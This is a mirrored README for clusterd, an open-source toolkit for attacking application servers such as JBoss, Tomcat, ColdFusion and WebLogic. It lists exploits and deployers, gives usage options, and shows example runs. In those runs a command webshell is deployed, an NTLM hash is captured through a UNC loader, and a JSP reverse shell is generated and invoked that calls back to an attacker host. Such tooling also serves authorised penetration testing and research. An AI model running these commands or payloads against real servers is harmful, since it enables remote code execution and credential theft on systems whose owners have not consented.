Code Monkey home page Code Monkey logo

clusterd's Introduction

clusterd

clusterd is an open source application server attack toolkit. Born out of frustration with current fingerprinting and exploitation methods, clusterd automates the fingerprinting, reconnaissance, and exploitation phases of an application server attack. See the wiki for more information.

Requirements

  • Python >= 2.7.x
  • Requests >= 2.2.x

Installation

The recommended installation of clusterd is to clone the Github repository

git clone https://github.com/hatRiot/clusterd.git

clusterd features

  • clusterd currently supports six different application server platforms, with several more currently in development and research phases

  • JBoss

    • Versions 3.x - 8.1
    • Currently supported deployers:
      • /jmx-console/MainDeployer for 3.x, 4.x, and 6.x
      • /jmx-console/DeploymentFileRepository for 3.x, 4.x, and 5.x
      • /web-console/Invoker (MainDeployer) for 3.x, 4.x, and 6.x
      • /web-console/Invoker (BSHDeployer) for 3.x and 4.x
      • /invoker/JMXInvokerServlet for 3.x, 4.x, and 5.x
      • /invoker/EJBInvokerServlet for 3.x, 4.x, and 5.x
      • /management for 7.x, 8.x
      • SEAM2 for 5.1, 6.x
    • Dump deployed WARs
    • Fetch host OS information
    • Verb tampering vulnerability (CVE-2010-0738)
    • Credential/path disclosure (CVE-2005-2006)
  • ColdFusion

    • Versions 5 - 11
    • Currently supported deployers:
      • Task Scheduler for 5.x, 6.x, 7.x, 8.x, 9.x, 10.x, and 11.x
      • FCKeditor for 8.x
      • LFI Log Injection 6.x, 7.x, and 8.x
    • Hash retrieval for versions 6 - 10
    • RDS admin bypass (CVE-2013-0632)
    • Pass the hash authentication for versions 7 - 9
  • WebLogic

    • Versions 7, 8.1, 11, and 12
    • Deployer over T3 and T3S currently tested against 11.x and 12.x
    • Dump deployed WARs over T3/T3S
    • Fetch host OS information
  • Tomcat

    • Versions 3.x - 8.x
    • Currently can deploy to all versions with an exposed manager interface
    • Dump deployed WARs
    • Fetch host OS information
  • Railo

    • Versions 3.x - 4.x
    • Currently supported deployers:
      • Task scheduler for 3.x and 4.x
      • Log injection for 3.x and 4.x
      • Thumbnail pre-auth RCE for 3.x and 4.x (up to 4.2.1)
    • Fetch host OS information
    • Pre-auth Password retrieval for 3.x - 4.2.1
  • Axis2

    • Versions 1.4 - 1.6
    • Currently supported deployers:
      • Admin interface for 1.4, 1.5, and 1.6
    • Fetch host OS information
    • View deployed services
    • Credential disclosure for 1.4
  • Glassfish

    • Versions 3.x - 4.x
    • View deployed services
    • Currently supported deployers:
      • Admin upload for 3.x and 4.x
  • Simple API for adding new platforms, fingerprints, deployers, and exploits

  • Various auxiliary modules for vulnerabilities and exploitation techniques

examples / usage

$ ./clusterd.py 

        clusterd/0.3.1 - clustered attack toolkit
            [Supporting 7 platforms]

usage: ./clusterd.py [options]

optional arguments:
  -h, --help            show this help message and exit

Connection:
  Options for configuring the connection

  -i [ip address]       Server address
  -iL [file]            Server list
  -p [port]             Server port
  --proxy [proxy://server:port]
                        Connect through proxy [http|https]
  --proxy-auth [username:password]
                        Proxy credentials
  --timeout [seconds]   Connection timeout [5s]
  --random-agent        Use a random User-Agent for requests
  --ssl                 Force SSL

Remote Host:
  Settings specific to the remote host

  -a [jboss|coldfusion|weblogic|tomcat|railo|axis2|glassfish]
                        Hint at remote host service
  -o [windows|linux]    Hint at remote host OS
  -v [version]          Specific version to test
  --usr-auth [username:password]
                        Login credentials for service
  --fingerprint         Fingerprint the remote system
  --arch [x86|x64]      Specify remote OS architecture

Deploy:
  Deployment flags and settings

  --deploy [file]       Deploy to the discovered service
  --undeploy [context]  Undeploy file from server
  --deployer [deployer]
                        Specify a deployer to use
  --invoke              Invoke payload after deployment
  --rand-payload        Use a random name for the deployed file
  -b [user]             Brute force credentials for user [admin]
  --wordlist [path]     Wordlist for brute forcing passwords

Other:
  Miscellaneous flags

  --deployer-list       List all available deployers
  --aux-list [platform]
                        List all available exploits
  --gen-payload [host:port] for reverse connection
                        Generate a reverse shell payload
  --discover [discovery_file]
                        Attempt to discover application servers using the
                        specified nmap gnmap output (use -sV when scanning)
  --listen [adapter]    Adapter to listen on when needed
  -d                    Enable debug output
  -l                    Log output to file [$time$_log.log]

jboss fingerprint and host info

$ ./clusterd.py -i 192.168.1.105 -a jboss --jb-info --random-agent

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-25 10:57PM] Started at 2014-05-25 10:57PM
 [2014-05-25 10:57PM] Servers' OS hinted at windows
 [2014-05-25 10:57PM] Fingerprinting host '192.168.1.105'
 [2014-05-25 10:57PM] Server hinted at 'jboss'
 [2014-05-25 10:57PM] Checking jboss version 3.2 JBoss JMX Console...
 [2014-05-25 10:57PM] Checking jboss version 3.2 JBoss Web Console...
 [2014-05-25 10:57PM] Checking jboss version 3.0 JBoss JMX Console...
 [2014-05-25 10:57PM] Checking jboss version 4.2 JBoss JMX Console...
 [2014-05-25 10:57PM] Checking jboss version 4.2 JBoss Web Console...
 [2014-05-25 10:57PM] Checking jboss version 4.0 JBoss JMX Console...
 [2014-05-25 10:57PM] Checking jboss version 4.0 JBoss Web Console...
 [2014-05-25 10:57PM] Checking jboss version 5.1 JBoss Web Manager...
 [2014-05-25 10:57PM] Checking jboss version 5.1 JBoss JMX Console...
 [2014-05-25 10:57PM] Checking jboss version 5.1 JBoss Web Console...
 [2014-05-25 10:57PM] Checking jboss version 5.0 JBoss JMX Console...
 [2014-05-25 10:57PM] Checking jboss version 5.0 JBoss Web Console...
 [2014-05-25 10:57PM] Checking jboss version 6.0 JBoss Web Manager...
 [2014-05-25 10:57PM] Checking jboss version 6.1 JBoss Web Manager...
 [2014-05-25 10:57PM] Checking jboss version 6.1 JBoss JMX Console...
 [2014-05-25 10:57PM] Checking jboss version 6.0 JBoss JMX Console...
 [2014-05-25 10:57PM] Checking jboss version 7.1 JBoss Management...
 [2014-05-25 10:57PM] Checking jboss version 7.0 JBoss Management...
 [2014-05-25 10:57PM] Checking jboss version 8.0 JBoss Management...
 [2014-05-25 10:57PM] Checking jboss version Any JBoss EJB Invoker Servlet...
 [2014-05-25 10:57PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
 [2014-05-25 10:57PM] Checking jboss version Any JBoss JMX Invoker Servlet...
 [2014-05-25 10:57PM] Checking jboss version Any JBoss RMI Interface...
 [2014-05-25 10:57PM] Checking jboss version Any JBoss Status Page...
 [2014-05-25 10:57PM] Matched 7 fingerprints for service jboss
 [2014-05-25 10:57PM]   JBoss JMX Console (version 5.0)
 [2014-05-25 10:57PM]   JBoss Web Console (version 5.0)
 [2014-05-25 10:57PM]   JBoss EJB Invoker Servlet (version Any)
 [2014-05-25 10:57PM]   JBoss HTTP Headers (Unreliable) (version 5.0)
 [2014-05-25 10:57PM]   JBoss JMX Invoker Servlet (version Any)
 [2014-05-25 10:57PM]   JBoss RMI Interface (version Any)
 [2014-05-25 10:57PM]   JBoss Status Page (version Any)
 [2014-05-25 10:57PM] Fingerprinting completed.
 [2014-05-25 10:57PM] Attempting to retrieve JBoss info...
 [2014-05-25 10:57PM]   ActiveThreadCount: 68    
 [2014-05-25 10:57PM]   AvailableProcessors: 1    
 [2014-05-25 10:57PM]   OSArch: amd64    
 [2014-05-25 10:57PM]   MaxMemory: 518979584    
 [2014-05-25 10:57PM]   HostAddress: 192.168.1.105    
 [2014-05-25 10:57PM]   JavaVersion: 1.7.0_45    
 [2014-05-25 10:57PM]   OSVersion: 6.1    
 [2014-05-25 10:57PM]   TotalMemory: 286703616    
 [2014-05-25 10:57PM]   JavaVendor: Oracle Corporation    
 [2014-05-25 10:57PM]   ActiveThreadGroupCount: 9    
 [2014-05-25 10:57PM]   OSName: Windows 7    
 [2014-05-25 10:57PM]   FreeMemory: 122651808    
 [2014-05-25 10:57PM]   HostName: bryan-PC    
 [2014-05-25 10:57PM]   JavaVMVersion: 24.45-b08    
 [2014-05-25 10:57PM]   JavaVMVendor: Oracle Corporation    
 [2014-05-25 10:57PM]   JavaVMName: Java HotSpot(TM) 64-Bit Server VM    
 [2014-05-25 10:57PM] Finished at 2014-05-25 10:57PM

jboss DFS deployment against JBoss 5.0

$ ./clusterd.py -i 192.168.1.105 -a jboss -v5.0 --deploy ./src/lib/resources/cmd.war --random-agent

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-25 11:00PM] Started at 2014-05-25 11:00PM
 [2014-05-25 11:00PM] Servers' OS hinted at windows
 [2014-05-25 11:00PM] Fingerprinting host '192.168.1.105'
 [2014-05-25 11:00PM] Server hinted at 'jboss'
 [2014-05-25 11:00PM] Checking jboss version 5.0 JBoss JMX Console...
 [2014-05-25 11:00PM] Checking jboss version 5.0 JBoss Web Console...
 [2014-05-25 11:00PM] Checking jboss version Any JBoss EJB Invoker Servlet...
 [2014-05-25 11:00PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
 [2014-05-25 11:00PM] Checking jboss version Any JBoss JMX Invoker Servlet...
 [2014-05-25 11:00PM] Checking jboss version Any JBoss RMI Interface...
 [2014-05-25 11:00PM] Checking jboss version Any JBoss Status Page...
 [2014-05-25 11:00PM] Matched 7 fingerprints for service jboss
 [2014-05-25 11:00PM]   JBoss JMX Console (version 5.0)
 [2014-05-25 11:00PM]   JBoss Web Console (version 5.0)
 [2014-05-25 11:00PM]   JBoss EJB Invoker Servlet (version Any)
 [2014-05-25 11:00PM]   JBoss HTTP Headers (Unreliable) (version 5.0)
 [2014-05-25 11:00PM]   JBoss JMX Invoker Servlet (version Any)
 [2014-05-25 11:00PM]   JBoss RMI Interface (version Any)
 [2014-05-25 11:00PM]   JBoss Status Page (version Any)
 [2014-05-25 11:00PM] Fingerprinting completed.
 [2014-05-25 11:00PM] This deployer requires a JSP, default to cmd.jsp? [Y/n] > 
 [2014-05-25 11:00PM] Preparing to deploy cmd...
 [2014-05-25 11:00PM] Successfully deployed '/cmd/cmd.jsp'
 [2014-05-25 11:00PM] Finished at 2014-05-25 11:00PM

jboss UNC hash retrieval

$ sudo ./clusterd.py -i 192.168.1.105 -a jboss -v4.2 --random-agent --jb-smb

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-25 11:01PM] Started at 2014-05-25 11:01PM
 [2014-05-25 11:01PM] Servers' OS hinted at windows
 [2014-05-25 11:01PM] Fingerprinting host '192.168.1.105'
 [2014-05-25 11:01PM] Server hinted at 'jboss'
 [2014-05-25 11:01PM] Checking jboss version 4.2 JBoss JMX Console...
 [2014-05-25 11:01PM] Checking jboss version 4.2 JBoss Web Console...
 [2014-05-25 11:01PM] Checking jboss version Any JBoss EJB Invoker Servlet...
 [2014-05-25 11:01PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
 [2014-05-25 11:01PM] Checking jboss version Any JBoss JMX Invoker Servlet...
 [2014-05-25 11:01PM] Checking jboss version Any JBoss RMI Interface...
 [2014-05-25 11:01PM] Checking jboss version Any JBoss Status Page...
 [2014-05-25 11:01PM] Matched 7 fingerprints for service jboss
 [2014-05-25 11:01PM]   JBoss JMX Console (version 4.2)
 [2014-05-25 11:01PM]   JBoss Web Console (version 4.2)
 [2014-05-25 11:01PM]   JBoss EJB Invoker Servlet (version Any)
 [2014-05-25 11:01PM]   JBoss HTTP Headers (Unreliable) (version 4.2)
 [2014-05-25 11:01PM]   JBoss JMX Invoker Servlet (version Any)
 [2014-05-25 11:01PM]   JBoss RMI Interface (version Any)
 [2014-05-25 11:01PM]   JBoss Status Page (version Any)
 [2014-05-25 11:01PM] Fingerprinting completed.
 [2014-05-25 11:01PM] Setting up SMB listener..
 [2014-05-25 11:01PM] Invoking UNC loader...
 [2014-05-25 11:01PM] bryan::bryan-PC:1122334455667788:34826253d353ebca4811bd08be0db067:01010000000000003dac35999f78cf019df7c49c7268a5f600000000020000000000000000000000
 [2014-05-25 11:01PM] Finished at 2014-05-25 11:01PM

tomcat deployment and reverse shell invocation

$ ./clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows

        clusterd/0.3 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-25 10:53PM] Started at 2014-05-25 10:53PM
 [2014-05-25 10:53PM] Generating payload....
 [2014-05-25 10:53PM] Payload generated (shell.war).  Payload: java/jsp_shell_reverse_tcp
 [2014-05-25 10:53PM] Servers' OS hinted at windows
 [2014-05-25 10:53PM] Fingerprinting host '192.168.1.105'
 [2014-05-25 10:53PM] Server hinted at 'tomcat'
 [2014-05-25 10:53PM] Checking tomcat version 5.5 Tomcat...
 [2014-05-25 10:53PM] Checking tomcat version 5.5 Tomcat Manager...
 [2014-05-25 10:53PM] Matched 2 fingerprints for service tomcat
 [2014-05-25 10:53PM]   Tomcat (version 5.5)
 [2014-05-25 10:53PM]   Tomcat Manager (version 5.5)
 [2014-05-25 10:53PM] Fingerprinting completed.
 [2014-05-25 10:53PM] Preparing to deploy /tmp/.clusterd/z1dgi.war...
 [2014-05-25 10:53PM] Deployed /tmp/.clusterd/z1dgi.war to /z1dgi
 [2014-05-25 10:53PM] z1dgi invoked at 192.168.1.105
 [2014-05-25 10:53PM] Finished at 2014-05-25 10:53PM

clusterd's People

Contributors

breenmachine avatar hatriot avatar jonbrenner avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.